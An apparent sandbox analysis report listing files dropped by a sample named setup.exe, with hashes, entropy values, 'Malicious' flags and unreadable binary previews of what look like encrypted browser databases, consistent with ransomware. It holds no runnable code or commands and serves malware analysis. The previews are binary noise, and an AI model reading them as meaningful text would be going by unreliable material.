              Preview:{"sesL...>.......i...ak...'....9.i...<.>.........U....-2.5...........M%.j..1..J.h..o..\S....!..,t8sl.3........I...n..&...j.x.b.\L...-.oEX.tX....a.#..n+.r..D......y'...6H...J.ZI........e.k={.Ul..[m*>...vrp......(.:.....8>..{..B...`4...R~.2...?I.......(.+K.......)qr....DhJwwY.<........0f.g.........vMt.p`.1.Lh._<..2.*F7.._..9..n..k.-m{f..l......u.q..Nt(.j..3.h.j%0...m..=hy...........dX.j....z.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):385
              Entropy (8bit):7.455389182438161
              Encrypted:false
              SSDEEP:12:YG9/iFxmEZFVHlrnrZo8RbNwb1dyzyCsMR2cii9a:Y+/i6EjVHF9omNSbD
              MD5:A1041926B9D6F1387AB19B994421FBAD
              SHA1:1411C46B15DDFBA82F9426BFCDFF819524CAD2FE
              SHA-256:5661062800E8993360D67705FDE4594F313988674DE9EAEE26B990737B26C297
              SHA-512:384A0A3A9343D5E1F79A599375E08F436795848E7B1DC3A782FA85FB23B3A9C670C6D1A71BA5E1EB5AD99DD68BB4541176A4387B631E96856C7F7BAB654440F7
              Malicious:false
              Preview:{"cli\..#:...h....u.....4.....2...j..'......O..g\H.`......_..Y......1....`).]......`9....p.....V.~kr.5.,....'...N....9..A.+F.n..6.qqK..N%...=7s..on...)H..M.o. .J.W0.w......r...m....< .UB<N.}.I.b;`..@a.J........./w..*!....6c."...T....Eqy%:..S..T.s*...~...)...d....>8.9..%T~......D....V..l*.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1638
              Entropy (8bit):7.8756327347279385
              Encrypted:false
              SSDEEP:48:2Jm3xSYySMhFckOI4kPNriSWeZIm33PZhJsqUEbD:2JmhSYySMFckOwPZiZcPZhJ3lX
              MD5:B27B883B7EDBE164662FFCDD25968C5E
              SHA1:76355551C84E2F756B10582CF00765EE0B1B3C86
              SHA-256:AA34E111A7862025EC84FC59A38D71321E224E9393F6855AF1E4BDA2241929E8
              SHA-512:1AF3038291925D5ED45D9648E36ED8545BA0AB6156F885ADD715DCCCE55EA773F989F231FB85F8DAE66F6F2416AA326361BD4940945DCDBD230FAC89951CCDA3
              Malicious:false
              Preview:mozLz .....g@\.*...x..Zr;..yC.{....Z(P.)...!PFNR.5.....8(..yh.\N.r.$.W.x...m;d#.s.......=....ra{...r.Wc.#)1..h.....x...0I..j..r..t4.....q.\R...&r-.X.S..Jm.C$R"....D.....;...@.I.t`..b...N..L..Lc.Lw..X.6.8.U...YI...g..wr...OD.V........y..q=&qRKT...L.m.E.;....Q$aR...\.......~..q.~..Dh..).{...z$.H........Dqp..2..F.9.*.U.!..D....*.H3.ER.1{&.D.T..*V%.....4...$J....S.N..l.V.{..C$...h...U.(x..F.)..R.z^A............2o._..._...E........*.,w.r..>..B.|...x.=(.6..........Z2....... 7.[.1+.JV.#..L9s....t."o...Mfg.l..I..+......G.C.6.9nU.!..h.........{.-...........*.$.(7{...m..4..F-.......`.~....-.!..#'lt..q.b...Z6..4..zm$...p.m....{...G.........C......d...'..$'...b..b...%An..d%..,.U...QZCl....sGpuo;b..4.:.c[]w<....#.f....P...0...F....Xx:.a..eV...D.?..r..8.w:N.d.x5.s......A|.......\xW..Kjt...(.=....N.&. .S..v!.[..7.=..).eY.........!J:..\_.Nw.:.{...+..5.$.d.w*P.%.:...w-./.^...oPFV........?z(...9..hU....\.7..id..K...E.....;..k....h.f..Pp...2y7.Y.:.5].......
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1638
              Entropy (8bit):7.884171297913323
              Encrypted:false
              SSDEEP:24:JvmPsWJiu3Gb145ozLSJ0XV+E0vStE8D4wYliH/iF8pLkmZykqETTbD:8PsWJiu3Gb14A20XoE4aHFfigLQGD
              MD5:AA03152F00EEF297E0DEABBFF09CBDF1
              SHA1:873A6D237FC735B196ADFD1A594E0FF1BF030FE5
              SHA-256:7C9ED65256183F427C7AA095308E1A535BA2EA7C08577D19B4DAF9529605BE18
              SHA-512:386062EED53B725D41E6B03ECC5BC35C432EEB940F8E4B958DC56AE41ED9A2CE5AC1515492D8A15A89C6915B2862A108B3AED36E5E490AB96287AA519BDB03FD
              Malicious:false
              Preview:mozLz.p..lV. B...,....b.....;..#g.L.[@O..Ka....;.x....*..Sj,...)...fL>C..n.....G.7".....a........mUm...*H!.unm.q..K.b..*.Lv..v.C.E...~.$..M.....w?8o.4.x....H..B1........P..Y.D.....X{..,..".{...yU.!....o.#.{.V@.zD........g.......^,..##...VK..M..()..X [)....vjY..@..TUw./.|.N|V5.?g...tT.l./..3-....=`..\......PYL.....Ju?c.qm>. (...F.-Q..u.,..x}r....J.....s.J'....j.s0..T.`*$p.>.:...O0R.o1.5E0;.......8.Q.?4.!c...g:.0.d.8...t..cue.W2....;.N.Wh...d.......t.VZ.....3..\.....{@3.mf......w.....Y;....C..d..cW.o&=U!.j........S.U.yM.,../..7PX*..=....V?..t...}a...../.i...`..g.F`.&....B..s\{..y.A7.`...[....2..-.....I....$.....s..r.m...n%..?.a|.11..3cxD`...0Q. .f.Z..0`..a9{....Q.o..Z.'.2o".....x.`.C.2=..2Yr.iWX.......w..w!....b.g..R...k................f......}.u.-.qo......MX...W..4fr..k....$...."1N-...by...p....Kr....,.!'..c....w~R..'%$.n..VW.x<h..As.Ex./.`......W......Q..'.j5.L..J...U,.........9:g"a2M.kbZ.......?f........R.O.#....t.S.......`......#
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):131406
              Entropy (8bit):7.998662409470821
              Encrypted:true
              SSDEEP:3072:bvVjfkXABRQhVhTImRtA/8dsVzMIdmWky4v910k5dI:btjsAQhVhTtAEdsLmRJv91Pa
              MD5:E0126A1FDCA7CC7A78C1FF96D06FCFFA
              SHA1:A54483692DCCC958547BAB6C073C3EEB680B568A
              SHA-256:D530599A6E9BFEC66571E8859009DE15595A9469E2F6C8894F881709D1B21345
              SHA-512:785BCB5CEC9F2E55A0A2124C28C266139E937D59410A291DF4BE26A10B455F86526D2ECC30F1DA6F4BF9AEF8248FB503B369913743DCE3910704CCB5D6379EC4
              Malicious:true
              Preview:SQLit..P......5..5 .......H.}..n...u......Y.t...N..l.dB...K...J9......qF.^nI.....}.c..w8..0Y.......Z..^..4.z.....8.1.l.Z..t.}&<...?.G..2.I....2..y....E+ g.+.W.v.*...8..ZF...2..&hn..... #Zn......C...._.}.I..U-...V..O/4..........X:.Fm......*....(.c..d...e.|Y..2?....W\.&3...._...m...R..(.f_.L"?x.^._.k.oU....[../^-.Z..f|..d ."V:..-H......7...2....B#..6..7.1..6./)....a..w{A....1./.N....W.6D...iY....`...V...OHP..y5..)..uh..E..P}v...7. ......#.{t..p.....#..Z..n.a.A..l{.z>..}my*..YLG......Kw..N^..S..g....6=.%....i.......}..8G.Z.....S.|.Q.!w..c...9.Mj.&.Tc_...T..1.....6.r.m............^||..E..d.:..{...dD.d....Y..!..&:L0...Q7.|.!.k....>..X\.... z=.......%MU..N.....2..H.....h.'R.8Rc..%...A..v.p.e=.T5....I.d...{3}:.ek.......u..M....Z.pD0......b.W..3.,.:pN...*.1\A.*..Q.x...5.g7.....G...\...."..}.H.A..-..w.w...5.B.....Sh.I.Q.....B.....g.,..1X.......M:L15.x.d7...p.F'.^3._.5H...v2.[...(.........."wG...3.."..Q..e.../.,...bQ*.Z...G..Xs\.................C.D..i .....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:TTComp archive data, binary, 4K dictionary
              Category:dropped
              Size (bytes):370
              Entropy (8bit):7.40252935935839
              Encrypted:false
              SSDEEP:6:yRgpEAh80b+OmmdliHMxf3RFGWwLGGD7O/i8E87qOWsXkNR2cii96Z:0/AK0aOBnvxfjGQ/LgsMR2cii9a
              MD5:16B1B0AF6C5805F1B4CCF7CFC70539E8
              SHA1:423B76E502B1E48895C26BE447D5DB247B9DEFFB
              SHA-256:84B95BA2944CF093B9A6BDEE55005079BE67CA9632B61425BE43E232CD5A8540
              SHA-512:90D6313C7F1626C8BA31D1BA2D5C0C5F4E0A7145814AD23C0C40ED75E7D3D2D97055C181CE7D0259EC287622F8401FF473FF3A5FF908CD230BE4A56F5312FCE2
              Malicious:false
              Preview:.........w.....I....2.W.<pM...+M..?jN.|......M<F4..1M?..Dft...t.f...n........|,....1.0].2u=.-...Zw..p.l.".......-...0...........2..=..b..z1..c. .P%r.U.......#...E.b\.!.H.n.....f....Kz.....n7....nA.@../...S.k...)......v.!.r..QX.8'..+..I.*}.t..M..........k.{..X.qI.F.(.].VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):49486
              Entropy (8bit):7.996622306593662
              Encrypted:true
              SSDEEP:1536:f5dplJTdGW5bKUAsaRMOWfFbBHaMJzZJdgwOc:ftlJ5GWdDxxOUbFd1n8c
              MD5:EF94A73087113C681F232871B010BEB6
              SHA1:A4633E605ECD2CE7393D53F922B210DEB858090F
              SHA-256:4865075B71E5E82D074093267CCB97DD8185F0CAC1728084122F28364268D147
              SHA-512:08CD3B6D02FB3157FDFD4D56A6B25377404DB9DD44F81F18420724DC8894220E5D5912A9DDBE0E52AC1DBCB7CC3C6785D719C626FAE4313AF5F766ECFA13FBD9
              Malicious:true
              Preview:SQLit....o2[......7.)..*...........h......f..r..2.@....1...=....:.......i.`N.g"...w....u.9M....3.U......~^.....U..Xgd+..5._/...|.....w.k..(..H...REV;o.QJ.|.j..i........f/.......x..R..L.}.w.%.CG@..13..U?.sy?..*..p..@..H.h"....%...:.@.ha.G.YNJxjna...m-!.7.z.1..{..n....i.O.P...+..p0..../.O.@....~..jQ..a.Q......o...-.%,..F..$...m.....\.&o...X.;R.ZFB.M..l..~.`...:B1&.I.q.......Wl...9...k.f^. ....:.6..U7U.B..1..n58......{&Av....|..ld.8.Y.>..U.L.5..:.Q.3....N.r.6..b.i.....=X.....ol.u.t.5Ro.D..5..?...'...y...x..e@.Z.....\....r........S..%0.0,......"....y..I[W.D...;.....T..e..7%y~..r.v..R..A....+{G.^)}..0.x.-....{Y.j.(.rXo........Yt._vR..a.T../V..g.GF.:....Mv....3....?..Gz..<....F.......Q.D...._A.W.|w 4...p........>`@...........]p.W.6.....|../[I....:.FS.z`.......O"....*...L..X..|.....X...D..y.Ijj..$.....9[.e..q\..z>......z0.K.5(M....!q........x....v[P..:...n.]....72....j.L9..s.../*.....j$..$]..B.K..t..qP.......^....x..1.Oo.y ...O..J.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):33102
              Entropy (8bit):7.994191816244249
              Encrypted:true
              SSDEEP:768:hJ96mHQlDb+LUAvrarvEzDyJZeVo1hKyVoiN0KY+Jpe:jLHQlXEUAvramDyjeOF1the
              MD5:BA87FC826B1C8B0B8BDA2B698D117D8A
              SHA1:28077BFF26128C9E6102BFF2BFC0AA5F42E91A56
              SHA-256:F53DE4CB2300612C4D3C1C318117D11F021A67BCCD0C2E88D994C0BCBA0DB636
              SHA-512:770ED7C007CA5150BB811CF824EB3175297EE4D3126DA78B7DBC321F84CFAB64C2320A47AEF34093DA82E524CFD1D5AA9C4F4F5FB25931E3485550B6529072C0
              Malicious:true
              Preview:..-...Q..r6.87.O...[?.TV.4.....U!......|{=...)......T...r........}.e+4.?z...(`....C<.....IM.q..Q.6....n...A(..c ....r...}E..8\....Er......V...V'...e..n.s....n..G.N..F"U)......'..p...y..u)c..)w..&.<.in.....?e...8...L^.j.s..c"8.Ko..N....ri...T._..Px....D(i.56'N..;.J>..7.p5.w...S.....a...v0..)*.....c@&..2....x$~1V..tl.....^.G.-G..'...L.u..L.U..y.F,..qO....O..M]PY..}..O_LIj!.M<..m..r....... z.K',..b...X.......9..P...^..Ct.".E......E'#.....A..J(.......P".@.....6Rei......f%.|.n+.AM.jT.........pab......V...8V....x..._.y......9...3..i{..T).].3.Z.\8.n.l5..o..N..c.{...a..8v.D{=a..$:.IHD.....O`..7@c! y5..=Yq..z...P..^d?.2..w.........3.L...~.....xG........Z.M.Ka..>.].g. .m.../.a....w.....1*F.$.....?...*+...n..m..Po.&^lV.&...s..*$UA>.l.A.K.L.Z&..@&.U.G&...^..+..#4.V`.O............b.....~G.S...kE.....K4..h]6.*N<e...[..oZ..;...[.2...-X.:....V,.yG.Q..5...."..BJF.vx..$5..p<.p5......1O.n.8.....pq....J...6.../z.z"/tA'J...R910"p........
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):49486
              Entropy (8bit):7.99614217595573
              Encrypted:true
              SSDEEP:1536:mK27BWFQLtrXA0Z1Cl2qIIY4edD7OlrEu6WW7:mv1pXtOlYrD7Olgu6T7
              MD5:2844C67683718974643C1BE9FC8CEBB3
              SHA1:E258D040C3B34D978CAD0B9058D879B0C4840DAC
              SHA-256:8D39846BCF8B16E8D69C53BAD4699A1698A60C30C2C368DBAF4908C0A22A7D9D
              SHA-512:7BA800B5CC58CCC4D66BF92760CF9430A444C3FF0AFFE470D840661FABBDF6D107B1D3BBFF3AF3DC6CD020D8047951818CFCB5950A315C7B16E6AEC134E61D6A
              Malicious:true
              Preview:SQLit..l.="..fo...wvSK...^....".....<.H..,.B.8|-..Q..N.a..n3V `..9.&..[!8_.]..l...A.S.[..:..i6.>..V.....2...4...........f._..;..`...].?..u..."X..Ov.........y<.4.X...d....)..'.......^.cC.>.Y...9.y.,G...z....t..T......'ciq%...[.j.g.&.Hq....|.hemE/n}.Q...2..EE.ID.......7R. m.'..EH.y....B....(kl...sL...9.A'....KwVP...o.W:.s&..].%.f...9)...JXo._....FK@.7`.7O.....I.....,C.3../T...........H!H..T...~.ht.B....{...:..T.m..!r.;....h.z.......yM{W...C....W..;.$.1.E!.@...'.6../.~.H..A..t..o......L....:..u...|{.Z.l..Q...}.'/.,.8..W..:...v.4.. %q.....,...<....ODc...O.6]kY;r.>..z...H.....S;.....[z.k....8...^..E...A.......J...1.....FI.DP..s*?9.v..h?.$......$..3......Jh..^.U.O..!..V.../.5*.[.Pm.r.'k.&Ems....0A.......e.-...~.........2..!.......T.....suW..!....+J.Q..J..1.].NlE7.i....b....p...g4).y..:K..X..e.K.pE....V...%;..G...>I........>...{Q._.............i.M..M.=u.U...&w....I...n....z...BJ.a.nL9.iEN....8..$n..l.....e..!..?Tk..+./T)..6.*
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):33102
              Entropy (8bit):7.993948072742002
              Encrypted:true
              SSDEEP:768:IdFyKlbO2Z0i81B2N4ywxbvg2P/qm5wsOMg8bM:oflbZZmryCYYVwsRFM
              MD5:A5F335D353516DDF73FB4F537AFB1829
              SHA1:54BBE40B12311693F55FE1619DF52613B658B8CB
              SHA-256:B22B65D03D5094F651F2823C217BF83E6D4DAF22B56BCB682CD816FA11770D5C
              SHA-512:059B43FA4288201D9A4368570C318A326DC673F5C1C3A5B3A1A2FFC56A425B4C775664905EF6A81BBEDCB81EBCFC43B2BE6AC87E07FE1B9EAABDA3AF75B677DF
              Malicious:true
              Preview:..-...E.!z.5......rBb.Tk.tq..v..Wf....DpFf.....y8@.....?...|.....6.....Q....hd9..N..,...@B........: .*... ..Qc"......*,...N.%.y...Y.G....e....gv!......'....G....h...>...7#.?....F9..|.q...P.n.c..]N...g>..$.......C6E.n/.F.14ZU.x.KB.?.....`..:..I.Q.....T...P....V.8.....4.|.v.$!..w....Qhcd...$.+....+..X..3......o....l.L.KN...L.GJ..w..[....m0......%S*.~.b.)....3.=..}...-|].......#.,3H..&f.B.Y.-D...9{.2Z...By......j..v..3..:..x.u...a.....L.H...\F.{u......H.y.:*.._Z.S%...g).I%K.eE>../a....n....v..L.....U.D..h..L.i.O...P.&/.V......J".X.+.@.G.h!sQ.O..h#H...,f.L........Y)_U............^p)a.....-.........Df..pJ0......x.E.....Jt..@...1.`..9*.u..'.p...bO..jn8.."4.ZHi.......A...9|.{..f&.Xr j.<.|.G;.?..s..`J.WHbu........SX...k....R...i.a..Q....S....JQ3k1p.]x.....*.L..a..^.....w..#.?d.2.XM-.&.....s.Xl........{.i....2..s.V|Ts..8...s..T..k,.r.".n.GS...y.D\..tT...sP...W*r.\,..W.DJ.W,-.......HS..>..........8..R{.~1m.l..}..].......K.`.6..f...5y*.M7l....^y.<z.s,
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):49486
              Entropy (8bit):7.995640145913651
              Encrypted:true
              SSDEEP:1536:PR754CvyEigEuvQAcMbjvILecla7xgRRnwR:cCvyfgVdjvIZla7QRng
              MD5:82EF7E74945FC79E59830F7AD85E6733
              SHA1:CE6126FD58050A00A00B68CB23E3F8B4F85B4FD4
              SHA-256:DBC730CCBF946CFB0D2DD8EEF9C4B6C22341E90465B360CD6A70D39D98C6841D
              SHA-512:58D4532D5270FDC59C9C4A90ECE2D842CFCFE38ECA47B82AAA1B10412B7904AEFFD6777ED7A06D3E1A260B6253297AA23544D8883D9964035A51E003CDCCA06B
              Malicious:true
              Preview:SQLit...Z.........g.}.....K..+.g...}....n... _...tl.T...S..*.....[X.....to.r...@.......N~.\}......H!...u*...ao.....TI.......s...cF...7.C...&.3b...8.r.@Y.......{.~.@*..c....({&....h...X...O.jk.x..Mp..S/s.{...../.l........t..l.9...Ny...w.~s...-.<.t0S].<k..!oj..aM.....j...R.".h..Z e.......k._...C..q.8...dt..Ye|...-#......J. ...a..*[......D...s.....u.....i.'.i54a.8$..~).Z/....).RCX.y..0.j.I...r.....5`....=o.[.m.@.P*...=*E.WV.."f..x.m.00d.....-...^..QU_.sA%...^.#.$..sJ....^..`.n.)w..j...4...-w..s.ld....i..u..m.."3........6.m.n)...Z...9..BJ.R..S...]....c...C+I.Ii...,.|.u.=,>.A.=B<.9.i.p.W..#..H.=.j,.....<...3..r....i...dX.Q...g.z .@.Y=...T[..z..j..-....A.&..u1y[...F......!.b..R.B..#...R5..u.M.U.cx..2.LY....\...Z....w.R9..:....Gy".B....sr6(...3..k..Vf.l}.. ..1.W.K.N.!.t...5.&M.....G]1..7..rn...B.+{<.u.=.)d...0.#2>.z...k,e.M...n. (]..$..f.[...........M....,......BS......Ie........S....F..G.............Sy..,.l'.>.`...Z....h`#.........Y.#..28...6..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):33102
              Entropy (8bit):7.994082345628208
              Encrypted:true
              SSDEEP:768:KvyMmCOmlzo0IruOh6MrKj8K+g1zt2sfcaNVwnBAChYT1wWkhI:KqtCOWbhOLKdr7wBA7pz
              MD5:9CA3352556298CC35A4FE98333B4A118
              SHA1:21D6BEAC3E9E46F6CB13C0F285A0C3F940749010
              SHA-256:52773964B42A539D049C59622E661A1C047EFF375567984EF6E90E8BC293B92D
              SHA-512:F8199FBA17F29C08DC1424A995163814DDCA0AFF5BC9B0778B95C956D5E1F7D931641079B0E08A5F649ABF16284EBB9ECB1B2FE446D6000A39FBB2E835A6C12E
              Malicious:true
              Preview:..-...J..=...e....7J..$Q.......V...U.p..;4..T.<..=.6;....5dL.7[<DIE(......of.s.W.....&q%...er.qd.O...+..Kc..U..Q..Z..$xt14..$A......@...[.b!...6....BbS.b.. ..5x...dU...U.V...c<.....(|By........"..u1...c6N.b;.q.:..J...e....N7...CtK..(..Wv0......m...T.?..>ve2.1b..=..'J...)._.......q,V.m\..V..\....< %0.x......(y...mO^..0H..i.5..n..... i!......j..9.T..4....3...2x.NL.K...A..6.....=..Jq6pWi.C'...Q.Fs....a.6.{.HZ.m...Q...|FY84.......8f....O2(u]|..F...q.*.....Wpr5.....i..5.c`..........Z.....#)r..;37..l...89/....6A.....^9..J.w.,..M....4:..,...&.......~....3~l.e.KUv....(.w.R$..K....6...,..rh...S9.fC....t...Y6...K..P.?........}..G.g..A.dR..X.....6...;.. X ..../....)-Y......|hZ.Z..F..x@..94....r{....{.8E6`...v..m.c......:`Pt.Ya..3.....-6Z{.2N.A}...}.4.;p.n...U....k......U^...8....:.WK`G.ps.....+eXQq....., W....i..*.......&.y.![...E,.....k.IMX4_.;vN.6{.wz..."|.c...mp.4.b..Y..P..)5....e.*....}.Z.33o.j..a..t....."...c..g$.4.:.&F.=.~?..t.Qx#s...8...y....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):49486
              Entropy (8bit):7.995803730677273
              Encrypted:true
              SSDEEP:768:X1LUKl8P+RHaqw6mUk9ft+VnLeUFppwlXs0fo/3qlCh62U0RBW:lLUKHaq7mUQt+hyUXUwfWWU
              MD5:60C698592B3E7777FEE4C43AB7C80887
              SHA1:15E1DA3DE86009B0AF98CF84C823FC8A3673FA5D
              SHA-256:1481057B42CF4D8E3908B9EC17FFEDADA60747674D5A2AB1BB8E910707922B86
              SHA-512:15D150D3A49E06A959A274FAC074A29163620719758C19F850B3864FC59C4649776AE5B8A70593A49CA458B802F0532AC4B69B0067B8E972170F636D4833C342
              Malicious:true
              Preview:SQLit..:(7#..(...J,D[7.o....->.2.,y..+..@J....~e'H.|."f....)..O+.U..}.E...v...W.C.J..w.4.{..m.A/........t.!.-..s..e.^..8Vk......&....+..../......%e.`}..sQ<V.".^.5.M.w..;..}...>...5......._.ENv.q......Eu..y../.._..a..g.~.f.;C<...!#.3.....\9{.$..H.....c.............!?..Fj...X2..O.fJM,.d....^.......[....-.R..=G....e...I.J......(.......~..G..".K.......m....;..I.*...W..a..y........K.h.~.g.D..8...V....#\WT.:./.u.....k....~t;n...-...qp)..+.aB...,U......EK..XF.%....U9..*m....o...7-C.....KQ..B.<..;%D~.YL.....P.\...J.Z.*?#a.....7m.o.f.i....ca.n.....E,..y..~....Q#..1..}R.x.n..J.T0.$.V...[...C...r..,.j7/g........5._...J......y..94g.....D.b.;...<~|T8.. Y..0.......p.&7N..m.......JF.2 -/.Q.#4+.N..z.<Fy..'..........>.l.n.........s.D.6.,k./.x.........4..os..w.....W.#=..x.s.}...*..1C3.;0.....f.Z...Q.9.].|.~.p....W....."~....=.f[...R.j...8...bX.Z.....D.h..8.d(.itw...6~8[1.%.s\....h'..M....w.V.1.'.\8...!....jD{.d...I.@>%.AU...M...U.`..._>(\.......8L.G0)..W.>.....*.%..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):33102
              Entropy (8bit):7.994156488342557
              Encrypted:true
              SSDEEP:768:eZlBq5ub6xUqQK78EYgULo1pSzZLXV0+1dgmJiavVchU:eZlkT+qQNbgG6SpXm+11VZ
              MD5:54B55826142724D172B698DD1F3A9F8D
              SHA1:8D049113A9557BFC3B5880130CF0BAAD0AAA306C
              SHA-256:2019CC4555AB3CD7D81F793BB0B7BEC40EE8BB8237AC73BE89DA3B6F149699FA
              SHA-512:F6739977A1E243CA357FBBB46FD3E5346B6EE20D7420ECD6A0CE89A0BBC3BA9C1892BC5CA134D2DE96CEF03EDDEFD369E85D11A2CDC6FE5CCA43B6D7C66B14AF
              Malicious:true
              Preview:..-..8.t...5...6.}).$..6I.~..........(..:...H'...ln.{@;R.Al0..o.h.3..3&.-.\.Lb.d..;1JeF..."...0.,....w...ZS..HC.hlK........._...^.2]0...e)...0..l.q..T.......4nI.%..W......-+...\....N....e....e.!.....C.&.j.]...$.\t.U.......jfW..4.=.Nn0.<i.......j...}|....."....K..eG+..BP.+......}.},... .....wK...S..*$.(!_l9.....|..41>.)..'m,..E .....za..P=.@.Z%.K....h.s..7.5{.|.(NU.9U..B[).R....w5......J.6ar.e~.l...A....O.Y.=.7.Qu......BJ.)....#.....N....Q..x..Ruhn.w..^k.np-....%.e...RY{...R....n.zo0Y9:.{....9.........I..](w..f.x&(.UA~.=.(....Z.Vt #...A...l}..D..``O..2...=......[)[.!...9."R..APb..{.r....d...0?R. .;+....Cg...HZ...G#o>#..{..O....wd......... cf.{..VG).N...9TZV......s53+....[I3.Ai.7.<-.....r.!..h...#c_..B..7.u~...}......p...!.>.+<..t..+........._..hE.....K.C`..n.....$F+...\L....X......V...x...h.~..9)I.e.3^..'..y@....5.....1..*,=^..M...73.....V,...M..Q$...q...~.=.%......{!..+P.....{i......i.].`@.mG....e..RQW.p...a...l..#..6..B..T.......|XR...ew..f.R
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):49486
              Entropy (8bit):7.9962873748735825
              Encrypted:true
              SSDEEP:768:epWEqe5xoua2Ny8HB8dGihxzgsnvUTW7mLbIgTsisg/jKcfUui4FaTOflS+Zzb5p:epWM3amy2FmzTU67uSChSi7ZzNVQc
              MD5:EDEC0C036B31BE404C2A08257F0BE152
              SHA1:BBFFC7F9243AFC6259770017621389DE21A6F746
              SHA-256:68E106232F4444B15AC1CAA88FB97F748DBDDDDCB4DD251E64C7F9EFDB2B8622
              SHA-512:92146758C531003501716B2037A34DA51D7BCCAF286E9A84F0983BA92FF8312DDB8D5AECAA4B570EFD65E1D0E6BFAEF9511B2A248C60032364A9FF75470D8D43
              Malicious:true
              Preview:SQLit2.G.>HC...n..>D.d...."..S.X..0E..K...)..W.../{.CNG...........-.G...=w..L..r@m.$.....}[.biN>...n8........>m..h..{..t:.qY....3.....D..p9..?m..z+...........3....|....(...<...l........n..tj:Q.[...9.rr.q~.?&.N10...GC..{"1.Y..Fq..SD.d.....Mw....h.jO.=8{.)...]m._....k0.q..]g.7.E..........?K.^..7......jb...cP.....*..P/.....s....A.|Il>.nmy....r.8.j..^s.77.....ki.C.Hz./...>/.f...G....e/...`.U..)...\.`.......e8.Sn.O...J...8.,Gh...6.Ibx .*....a*......_..p......0..dg./eEs..9...@S.2A.]*X3.J3Ca_...k...-..`).<..k...{bZ.t.TS.....v-n.p....N_.R...'..e...I.....W.h..B..l.....I .;......;>F.<..x.@V...i ...`f..../D......+N4H.DQ|N.|nS....8.`...L.....V...N.8.t.....Du...{g.....0..5..Y.sam <Y..r...Q>Rv.........m..?.bQ..=.2..8.&v...C/V...:+:.x.~....e.q._K}.....k.F,.1.....}~t...|.,K.<...*..q*..$@?.?....O.n.;O.......2s.....%..N...t5..k^y...XKL.6...YQ..I.....-.~..^#.....}.L...g.m.j....y....p.J....U.Km..I...%....v%.$..Z.5....C...t..coJ.5>.i#..!....h..`.............
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):33102
              Entropy (8bit):7.994585609915918
              Encrypted:true
              SSDEEP:768:MkSmGTQ+0cdg+zUOjU+wNMHHWTRN4cFjwvuD:MkjGMwrzUOgMHHeRN4cdYuD
              MD5:3A650F88D5B9BA29843BC9A9743CC0B7
              SHA1:6BF62FDC66AA02672FB587E9714C247CCFD22BCD
              SHA-256:8A727620AE0832FC11AF2919147FAD16E64DACD9DA93C4E314EB24D2D3FC2B41
              SHA-512:90B99B79FDF982EEE3DD777D0B963C87AE2F4FCA2FF664470753758AC80A30EBA0760F796C24C87F75C11D7417794FDDDBAD774D88541C465BFFE8A1E69E8B52
              Malicious:true
              Preview:..-...B.=..6.] .#R.......-..q......nR.jy:....J..E.....!..._v..........Xwm...q!6k7...0...R..h.z...E[..z.f.....F.....p.mLO.C.....@..9...O...T....9.:m.w.2.9.........G..$.dSd5..g.1...3.>...D.l._+...).d.,.m.......g.T)6....S..................YD...+.E..lwt.Fo.f...yU...m...P:99....j.aw...'.MUTa....#..YC`.7.._#.....:.'.|..>h..eb8+N.>nk...TH)/t..?.d..}.Q+...*.Y...C..>.....3..[.. ...A...e..dt.;A....e:..{...#...$........A...}...M.H...Rr.]7..(..w..auE........]]..~..s...K..U6...58K..k...C.....L..+T..R..b#...M..s=....;d.O..I..r?.8_SD.<z,.&C..$..a.o...#L].s...*....i.....>d...1.tz.9#9......2">).OX...dQC-.::^SM.xC.j8E..T.......Yfn.....!..w.......(}.|...H..ha..S..4......C.nY"kK.D.....#>.6...!..........q.....D......RL......r%..@.G$gG...B.!1......$/....~.0k.H.`..R.OH...x....P ....?.O..........B3"..O.V...dIz.(..T,....d.Y...G..fG...stbw`....B.!..6u.....%.D...ZA.b....o...y..........Eh........UZ2.....B*.E.....R..3S.bA..G...(zw.....nr...k..=.t.....z.c....k.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):541006
              Entropy (8bit):5.61991717833652
              Encrypted:false
              SSDEEP:6144:UlMN6GeLYJ8r+YSDniEwqsX2YkGE/f2RaD09Cw/o7J:J0LYJ88niEwqsG2HRaD0xgJ
              MD5:D64113B4BCE1A352DB797279C2FFD706
              SHA1:0D0FBC80E1DC10D093079C6D5DFDCDE3D65FE065
              SHA-256:EEAF8E1CEC0D8CCACDBD3C25DF40FF1F219C5FB9A5C0025BEDCCA6716298659E
              SHA-512:75A01567B2990938726CB86689502FB0B8338DB7A246C8EC0573D87BBFB6A45E52B3785DBDC44AB9CE66D0A229D1281E85295B6AE4AAC4707E9C861FC18AA72D
              Malicious:true
